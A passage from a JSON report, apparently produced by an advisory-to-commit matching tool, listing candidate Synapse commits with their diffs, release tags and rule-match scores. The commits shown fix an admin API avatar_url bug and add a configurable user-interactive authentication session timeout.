"v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8874, 8874", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: homeserver, server", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8874", + "relevance": 2 + } + ] + }, + { + "commit_id": "ff1f0ee09472b554832fb39952f389d01a4233ac", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607368387, + "hunks": 9, + "message": "Call set_avatar_url with target_user, not user_id (#8872) * Call set_avatar_url with target_user, not user_id Fixes https://github.com/matrix-org/synapse/issues/8871 * Create 8872.bugfix * Update synapse/rest/admin/users.py Co-authored-by: Patrick Cloke * Testing * Update changelog.d/8872.bugfix Co-authored-by: Andrew Morgan <1342360+anoadragon453@users.noreply.github.com> Co-authored-by: Patrick Cloke Co-authored-by: Andrew Morgan <1342360+anoadragon453@users.noreply.github.com>", + "diff": [ + "diff --git a/changelog.d/8872.bugfix b/changelog.d/8872.bugfix", + "new file mode 100644", + "index 000000000..ed00b70a0", + "--- /dev/null", + "+++ b/changelog.d/8872.bugfix", + "@@ -0,0 +1 @@", + "+Fix a bug where `PUT /_synapse/admin/v2/users/` failed to create a new user when `avatar_url` is specified. Bug introduced in Synapse v1.9.0.", + "diff --git a/synapse/rest/admin/users.py b/synapse/rest/admin/users.py", + "index 90940ff18..88cba369f 100644", + "--- a/synapse/rest/admin/users.py", + "+++ b/synapse/rest/admin/users.py", + "@@ -322,5 +322,5 @@ class UserRestServletV2(RestServlet):", + "- if \"avatar_url\" in body and type(body[\"avatar_url\"]) == str:", + "+ if \"avatar_url\" in body and isinstance(body[\"avatar_url\"], str):", + " await self.profile_handler.set_avatar_url(", + "- user_id, requester, body[\"avatar_url\"], True", + "+ target_user, requester, body[\"avatar_url\"], True", + " )", + "diff --git a/tests/rest/admin/test_user.py b/tests/rest/admin/test_user.py", + "index 35c546aa6..ba1438cdc 100644", + "--- a/tests/rest/admin/test_user.py", + "+++ b/tests/rest/admin/test_user.py", + "@@ -563,3 +563,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " \"threepids\": [{\"medium\": \"email\", \"address\": \"bob@bob.bob\"}],", + "- \"avatar_url\": None,", + "+ \"avatar_url\": \"mxc://fibble/wibble\",", + " }", + "@@ -580,2 +580,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " self.assertEqual(True, channel.json_body[\"admin\"])", + "+ self.assertEqual(\"mxc://fibble/wibble\", channel.json_body[\"avatar_url\"])", + "@@ -594,2 +595,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " self.assertEqual(False, channel.json_body[\"deactivated\"])", + "+ self.assertEqual(\"mxc://fibble/wibble\", channel.json_body[\"avatar_url\"])", + "@@ -608,2 +610,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " \"threepids\": [{\"medium\": \"email\", \"address\": \"bob@bob.bob\"}],", + "+ \"avatar_url\": \"mxc://fibble/wibble\",", + " }", + "@@ -624,2 +627,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " self.assertEqual(False, channel.json_body[\"admin\"])", + "+ self.assertEqual(\"mxc://fibble/wibble\", channel.json_body[\"avatar_url\"])", + "@@ -638,2 +642,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " self.assertEqual(False, channel.json_body[\"deactivated\"])", + "+ self.assertEqual(\"mxc://fibble/wibble\", channel.json_body[\"avatar_url\"])" + ], + "changed_files": [ + "changelog.d/8872.bugfix", + "synapse/rest/admin/users.py", + "tests/rest/admin/test_user.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8872": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8872, 8872", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: issue", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8872", + "relevance": 2 + } + ] + }, + { + "commit_id": "5d4c330ed979b0d60efe5f80fd76de8f162263a1", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608294837, + "hunks": 41, + "message": "Allow re-using a UI auth validation for a period of time (#8970)", + "diff": [ + "diff --git a/changelog.d/8970.feature b/changelog.d/8970.feature", + "new file mode 100644", + "index 000000000..6d5b3303a", + "--- /dev/null", + "+++ b/changelog.d/8970.feature", + "@@ -0,0 +1 @@", + "+Allow re-using an user-interactive authentication session for a period of time.", + "diff --git a/docs/sample_config.yaml b/docs/sample_config.yaml", + "index 75a01094d..549c581a9 100644", + "--- a/docs/sample_config.yaml", + "+++ b/docs/sample_config.yaml", + "@@ -2070,2 +2070,17 @@ password_config:", + "+ui_auth:", + "+ # The number of milliseconds to allow a user-interactive authentication", + "+ # session to be active.", + "+ #", + "+ # This defaults to 0, meaning the user is queried for their credentials", + "+ # before every action, but this can be overridden to alow a single", + "+ # validation to be re-used. This weakens the protections afforded by", + "+ # the user-interactive authentication process, by allowing for multiple", + "+ # (and potentially different) operations to use the same validation session.", + "+ #", + "+ # Uncomment below to allow for credential validation to last for 15", + "+ # seconds.", + "+ #", + "+ #session_timeout: 15000", + "+", + "diff --git a/synapse/config/_base.pyi b/synapse/config/_base.pyi", + "index ed26e2fb6..29aa064e5 100644", + "--- a/synapse/config/_base.pyi", + "+++ b/synapse/config/_base.pyi", + "@@ -5,2 +5,3 @@ from synapse.config import (", + " appservice,", + "+ auth,", + " captcha,", + "@@ -16,3 +17,2 @@ from synapse.config import (", + " oidc_config,", + "- password,", + " password_auth_providers,", + "@@ -67,3 +67,3 @@ class RootConfig:", + " jwt: jwt_config.JWTConfig", + "- password: password.PasswordConfig", + "+ auth: auth.AuthConfig", + " email: emailconfig.EmailConfig", + "diff --git a/synapse/config/auth.py b/synapse/config/auth.py", + "new file mode 100644", + "index 000000000..2b3e2ce87", + "--- /dev/null", + "+++ b/synapse/config/auth.py", + "@@ -0,0 +1,110 @@", + "+# -*- coding: utf-8 -*-", + "+# Copyright 2015, 2016 OpenMarket Ltd", + "+# Copyright 2020 The Matrix.org Foundation C.I.C.", + "+#", + "+# Licensed under the Apache License, Version 2.0 (the \"License\");", + "+# you may not use this file except in compliance with the License.", + "+# You may obtain a copy of the License at", + "+#", + "+# http://www.apache.org/licenses/LICENSE-2.0", + "+#", + "+# Unless required by applicable law or agreed to in writing, software", + "+# distributed under the License is distributed on an \"AS IS\" BASIS,", + "+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+# See the License for the specific language governing permissions and", + "+# limitations under the License.", + "+", + "+from ._base import Config", + "+", + "+", + "+class AuthConfig(Config):", + "+ \"\"\"Password and login configuration", + "+ \"\"\"", + "+", + "+ section = \"auth\"", + "+", + "+ def read_config(self, config, **kwargs):", + "+ password_config = config.get(\"password_config\", {})", + "+ if password_config is None:", + "+ password_config = {}", + "+", + "+ self.password_enabled = password_config.get(\"enabled\", True)", + "+ self.password_localdb_enabled = password_config.get(\"localdb_enabled\", True)", + "+ self.password_pepper = password_config.get(\"pepper\", \"\")", + "+", + "+ # Password policy", + "+ self.password_policy = password_config.get(\"policy\") or {}", + "+ self.password_policy_enabled = self.password_policy.get(\"enabled\", False)", + "+", + "+ # User-interactive authentication", + "+ ui_auth = config.get(\"ui_auth\") or {}", + "+ self.ui_auth_session_timeout = ui_auth.get(\"session_timeout\", 0)", + "+", + "+ def generate_config_section(self, config_dir_path, server_name, **kwargs):", + "+ return \"\"\"\\", + "+ password_config:", + "+ # Uncomment to disable password login", + "+ #", + "+ #enabled: false", + "+", + "+ # Uncomment to disable authentication against the local password", + "+ # database. This is ignored if `enabled` is false, and is only useful", + "+ # if you have other password_providers.", + "+ #", + "+ #localdb_enabled: false", + "+", + "+ # Uncomment and change to a secret random string for extra security.", + "+ # DO NOT CHANGE THIS AFTER INITIAL SETUP!", + "+ #", + "+ #pepper: \"EVEN_MORE_SECRET\"", + "+", + "+ # Define and enforce a password policy. Each parameter is optional.", + "+ # This is an implementation of MSC2000.", + "+ #", + "+ policy:", + "+ # Whether to enforce the password policy.", + "+ # Defaults to 'false'.", + "+ #", + "+ #enabled: true", + "+", + "+ # Minimum accepted length for a password.", + "+ # Defaults to 0.", + "+ #", + "+ #minimum_length: 15", + "+", + "+ # Whether a password must contain at least one digit.", + "+ # Defaults to 'false'.", + "+ #", + "+ #require_digit: true", + "+", + "+ # Whether a password must contain at least one symbol.", + "+ # A symbol is any character that's not a number or a letter.", + "+ # Defaults to 'false'.", + "+ #", + "+ #require_symbol: true", + "+", + "+ # Whether a password must contain at least one lowercase letter.", + "+ # Defaults to 'false'.", + "+ #", + "+ #require_lowercase: true", + "+", + "+ # Whether a password must contain at least one lowercase letter.", + "+ # Defaults to 'false'.", + "+ #", + "+ #require_uppercase: true", + "+", + "+ ui_auth:", + "+ # The number of milliseconds to allow a user-interactive authentication", + "+ # session to be active.", + "+ #", + "+ # This defaults to 0, meaning the user is queried for their credentials", + "+ # before every action, but this can be overridden to alow a single", + "+ # validation to be re-used. This weakens the protections afforded by", + "+ # the user-interactive authentication process, by allowing for multiple", + "+ # (and potentially different) operations to use the same validation session.", + "+ #", + "+ # Uncomment below to allow for credential validation to last for 15", + "+ # seconds.", + "+ #", + "+ #session_timeout: 15000", + "+ \"\"\"", + "diff --git a/synapse/config/homeserver.py b/synapse/config/homeserver.py", + "index be6555452..4bd2b3587 100644", + "--- a/synapse/config/homeserver.py", + "+++ b/synapse/config/homeserver.py", + "@@ -19,2 +19,3 @@ from .api import ApiConfig", + " from .appservice import AppServiceConfig", + "+from .auth import AuthConfig", + " from .cache import CacheConfig", + "@@ -32,3 +33,2 @@ from .metrics import MetricsConfig", + " from .oidc_config import OIDCConfig", + "-from .password import PasswordConfig", + " from .password_auth_providers import PasswordAuthProviderConfig", + "@@ -78,3 +78,3 @@ class HomeServerConfig(RootConfig):", + " JWTConfig,", + "- PasswordConfig,", + "+ AuthConfig,", + " EmailConfig,", + "diff --git a/synapse/handlers/auth.py b/synapse/handlers/auth.py", + "index 57ff461f9..f4434673d 100644", + "--- a/synapse/handlers/auth.py", + "+++ b/synapse/handlers/auth.py", + "@@ -228,2 +228,5 @@ class AuthHandler(BaseHandler):", + "+ # The number of seconds to keep a UI auth session active.", + "+ self._ui_auth_session_timeout = hs.config.ui_auth_session_timeout", + "+", + " # Ratelimitier for failed /login attempts", + "@@ -285,3 +288,3 @@ class AuthHandler(BaseHandler):", + " description: str,", + "- ) -> Tuple[dict, str]:", + "+ ) -> Tuple[dict, Optional[str]]:", + " \"\"\"", + "@@ -312,3 +315,4 @@ class AuthHandler(BaseHandler):", + " 'session_id' is the ID of this session, either passed in by the", + "- client or assigned by this call", + "+ client or assigned by this call. This is None if UI auth was", + "+ skipped (by re-using a previous validation).", + "@@ -326,2 +330,12 @@ class AuthHandler(BaseHandler):", + "+ if self._ui_auth_session_timeout:", + "+ last_validated = await self.store.get_access_token_last_validated(", + "+ requester.access_token_id", + "+ )", + "+ if self.clock.time_msec() - last_validated < self._ui_auth_session_timeout:", + "+ # Return the input parameters, minus the auth key, which matches", + "+ # the logic in check_ui_auth.", + "+ request_body.pop(\"auth\", None)", + "+ return request_body, None", + "+", + " user_id = requester.user.to_string()", + "@@ -361,2 +375,5 @@ class AuthHandler(BaseHandler):", + "+ # Note that the access token has been validated.", + "+ await self.store.update_access_token_last_validated(requester.access_token_id)", + "+", + " return params, session_id", + "@@ -454,9 +471,6 @@ class AuthHandler(BaseHandler):", + "- authdict = None", + " sid = None # type: Optional[str]", + "- if clientdict and \"auth\" in clientdict:", + "- authdict = clientdict[\"auth\"]", + "- del clientdict[\"auth\"]", + "- if \"session\" in authdict:", + "- sid = authdict[\"session\"]", + "+ authdict = clientdict.pop(\"auth\", {})", + "+ if \"session\" in authdict:", + "+ sid = authdict[\"session\"]", + "@@ -565,2 +579,4 @@ class AuthHandler(BaseHandler):", + " for f in flows:", + "+ # If all the required credentials have been supplied, the user has", + "+ # successfully completed the UI auth process!", + " if len(set(f) - set(creds)) == 0:", + "diff --git a/synapse/rest/client/v2_alpha/account.py b/synapse/rest/client/v2_alpha/account.py", + "index eebee44a4..d837bde1d 100644", + "--- a/synapse/rest/client/v2_alpha/account.py", + "+++ b/synapse/rest/client/v2_alpha/account.py", + "@@ -256,7 +256,7 @@ class PasswordRestServlet(RestServlet):", + "- # If we have a password in this request, prefer it. Otherwise, there", + "- # must be a password hash from an earlier request.", + "+ # If we have a password in this request, prefer it. Otherwise, use the", + "+ # password hash from an earlier request.", + " if new_password:", + " password_hash = await self.auth_handler.hash(new_password)", + "- else:", + "+ elif session_id is not None:", + " password_hash = await self.auth_handler.get_session_data(", + "@@ -264,2 +264,6 @@ class PasswordRestServlet(RestServlet):", + " )", + "+ else:", + "+ # UI validation was skipped, but the request did not include a new", + "+ # password.", + "+ password_hash = None", + " if not password_hash:", + "diff --git a/synapse/storage/databases/main/registration.py b/synapse/storage/databases/main/registration.py", + "index ff96c34c2..8d05288ed 100644", + "--- a/synapse/storage/databases/main/registration.py", + "+++ b/synapse/storage/databases/main/registration.py", + "@@ -945,2 +945,38 @@ class RegistrationWorkerStore(CacheInvalidationWorkerStore):", + "+ async def get_access_token_last_validated(self, token_id: int) -> int:", + "+ \"\"\"Retrieves the time (in milliseconds) of the last validation of an access token.", + "+", + "+ Args:", + "+ token_id: The ID of the access token to update.", + "+ Raises:", + "+ StoreError if the access token was not found.", + "+", + "+ Returns:", + "+ The last validation time.", + "+ \"\"\"", + "+ result = await self.db_pool.simple_select_one_onecol(", + "+ \"access_tokens\", {\"id\": token_id}, \"last_validated\"", + "+ )", + "+", + "+ # If this token has not been validated (since starting to track this),", + "+ # return 0 instead of None.", + "+ return result or 0", + "+", + "+ async def update_access_token_last_validated(self, token_id: int) -> None:", + "+ \"\"\"Updates the last time an access token was validated.", + "+", + "+ Args:", + "+ token_id: The ID of the access token to update.", + "+ Raises:", + "+ StoreError if there was a problem updating this.", + "+ \"\"\"", + "+ now = self._clock.time_msec()", + "+", + "+ await self.db_pool.simple_update_one(", + "+ \"access_tokens\",", + "+ {\"id\": token_id},", + "+ {\"last_validated\": now},", + "+ desc=\"update_access_token_last_validated\",", + "+ )", + "+", + "@@ -1152,2 +1188,3 @@ class RegistrationStore(StatsStore, RegistrationBackgroundUpdateStore):", + " next_id = self._access_tokens_id_gen.get_next()", + "+ now = self._clock.time_msec()", + "@@ -1162,2 +1199,3 @@ class RegistrationStore(StatsStore, RegistrationBackgroundUpdateStore):", + " \"puppets_user_id\": puppets_user_id,", + "+ \"last_validated\": now,", + " },", + "diff --git a/synapse/storage/databases/main/schema/delta/58/26access_token_last_validated.sql b/synapse/storage/databases/main/schema/delta/58/26access_token_last_validated.sql", + "new file mode 100644", + "index 000000000..1a101cd5e", + "--- /dev/null", + "+++ b/synapse/storage/databases/main/schema/delta/58/26access_token_last_validated.sql", + "@@ -0,0 +1,18 @@", + "+/* Copyright 2020 The Matrix.org Foundation C.I.C", + "+ *", + "+ * Licensed under the Apache License, Version 2.0 (the \"License\");", + "+ * you may not use this file except in compliance with the License.", + "+ * You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+-- The last time this access token was \"validated\" (i.e. logged in or succeeded", + "+-- at user-interactive authentication).", + "+ALTER TABLE access_tokens ADD COLUMN last_validated BIGINT;", + "diff --git a/tests/rest/client/v2_alpha/test_auth.py b/tests/rest/client/v2_alpha/test_auth.py", + "index 51323b3da..ac66a4e0b 100644", + "--- a/tests/rest/client/v2_alpha/test_auth.py", + "+++ b/tests/rest/client/v2_alpha/test_auth.py", + "@@ -15,3 +15,3 @@", + "-from typing import List, Union", + "+from typing import Union", + "@@ -179,9 +179,4 @@ class UIAuthTests(unittest.HomeserverTestCase):", + " self.user = self.register_user(\"test\", self.user_pass)", + "- self.user_tok = self.login(\"test\", self.user_pass)", + "-", + "- def get_device_ids(self, access_token: str) -> List[str]:", + "- # Get the list of devices so one can be deleted.", + "- channel = self.make_request(\"GET\", \"devices\", access_token=access_token,)", + "- self.assertEqual(channel.code, 200)", + "- return [d[\"device_id\"] for d in channel.json_body[\"devices\"]]", + "+ self.device_id = \"dev1\"", + "+ self.user_tok = self.login(\"test\", self.user_pass, self.device_id)", + "@@ -221,7 +216,5 @@ class UIAuthTests(unittest.HomeserverTestCase):", + " \"\"\"", + "- device_id = self.get_device_ids(self.user_tok)[0]", + "-", + " # Attempt to delete this device.", + " # Returns a 401 as per the spec", + "- channel = self.delete_device(self.user_tok, device_id, 401)", + "+ channel = self.delete_device(self.user_tok, self.device_id, 401)", + "@@ -235,3 +228,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", + " self.user_tok,", + "- device_id,", + "+ self.device_id,", + " 200,", + "@@ -254,4 +247,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", + "- device_id = self.get_device_ids(self.user_tok)[0]", + "- channel = self.delete_device(self.user_tok, device_id, 401)", + "+ channel = self.delete_device(self.user_tok, self.device_id, 401)", + " session = channel.json_body[\"session\"]", + "@@ -261,3 +253,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", + " self.user_tok,", + "- device_id,", + "+ self.device_id,", + " 200,", + "@@ -284,6 +276,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", + " # Create a second login.", + "- self.login(\"test\", self.user_pass)", + "-", + "- device_ids = self.get_device_ids(self.user_tok)", + "- self.assertEqual(len(device_ids), 2)", + "+ self.login(\"test\", self.user_pass, \"dev2\")", + "@@ -291,3 +280,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", + " # Returns a 401 as per the spec", + "- channel = self.delete_devices(401, {\"devices\": [device_ids[0]]})", + "+ channel = self.delete_devices(401, {\"devices\": [self.device_id]})", + "@@ -303,3 +292,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", + " {", + "- \"devices\": [device_ids[1]],", + "+ \"devices\": [\"dev2\"],", + " \"auth\": {", + "@@ -318,6 +307,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", + " # Create a second login.", + "- self.login(\"test\", self.user_pass)", + "-", + "- device_ids = self.get_device_ids(self.user_tok)", + "- self.assertEqual(len(device_ids), 2)", + "+ self.login(\"test\", self.user_pass, \"dev2\")", + "@@ -325,3 +311,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", + " # Returns a 401 as per the spec", + "- channel = self.delete_device(self.user_tok, device_ids[0], 401)", + "+ channel = self.delete_device(self.user_tok, self.device_id, 401)", + "@@ -334,5 +320,7 @@ class UIAuthTests(unittest.HomeserverTestCase):", + " # second device. This results in an error.", + "+ #", + "+ # This makes use of the fact that the device ID is embedded into the URL.", + " self.delete_device(", + " self.user_tok,", + "- device_ids[1],", + "+ \"dev2\",", + " 403,", + "@@ -348,2 +336,48 @@ class UIAuthTests(unittest.HomeserverTestCase):", + "+ @unittest.override_config({\"ui_auth\": {\"session_timeout\": 5 * 1000}})", + "+ def test_can_reuse_session(self):", + "+ \"\"\"", + "+ The session can be reused if configured.", + "+", + "+ Compare to test_cannot_change_uri.", + "+ \"\"\"", + "+ # Create a second and third login.", + "+ self.login(\"test\", self.user_pass, \"dev2\")", + "+ self.login(\"test\", self.user_pass, \"dev3\")", + "+", + "+ # Attempt to delete a device. This works since the user just logged in.", + "+ self.delete_device(self.user_tok, \"dev2\", 200)", + "+", + "+ # Move the clock forward past the validation timeout.", + "+ self.reactor.advance(6)", + "+", + "+ # Deleting another devices throws the user into UI auth.", + "+ channel = self.delete_device(self.user_tok, \"dev3\", 401)", + "+", + "+ # Grab the session", + "+ session = channel.json_body[\"session\"]", + "+ # Ensure that flows are what is expected.", + "+ self.assertIn({\"stages\": [\"m.login.password\"]}, channel.json_body[\"flows\"])", + "+", + "+ # Make another request providing the UI auth flow.", + "+ self.delete_device(", + "+ self.user_tok,", + "+ \"dev3\",", + "+ 200,", + "+ {", + "+ \"auth\": {", + "+ \"type\": \"m.login.password\",", + "+ \"identifier\": {\"type\": \"m.id.user\", \"user\": self.user},", + "+ \"password\": self.user_pass,", + "+ \"session\": session,", + "+ },", + "+ },", + "+ )", + "+", + "+ # Make another request, but try to delete the first device. This works", + "+ # due to re-using the previous session.", + "+ #", + "+ # Note that *no auth* information is provided, not even a session iD!", + "+ self.delete_device(self.user_tok, self.device_id, 200)", + "+", + " def test_does_not_offer_password_for_sso_user(self):", + "@@ -363,4 +397,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", + " # and not password.", + "- device_ids = self.get_device_ids(self.user_tok)", + "- channel = self.delete_device(self.user_tok, device_ids[0], 401)", + "+ channel = self.delete_device(self.user_tok, self.device_id, 401)", + "@@ -375,4 +408,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", + "- device_ids = self.get_device_ids(self.user_tok)", + "- channel = self.delete_device(self.user_tok, device_ids[0], 401)", + "+ channel = self.delete_device(self.user_tok, self.device_id, 401)" + ], + "changed_files": [ + "changelog.d/8970.feature", + "docs/sample_config.yaml", + "synapse/config/_base.pyi", + "synapse/config/auth.py", + "synapse/config/homeserver.py", + "synapse/handlers/auth.py", + "synapse/rest/client/v2_alpha/account.py", + "synapse/storage/databases/main/registration.py", + "synapse/storage/databases/main/schema/delta/58/26access_token_last_validated.sql", + "tests/rest/client/v2_alpha/test_auth.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8970": "Remove unused last_used column from access_tokens table #8972 Merge Synapse release v1.31.0 into dinsic matrix-org/synapse-dinsic#97 Only allow skipping UI auth for certain actions. #10184" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + 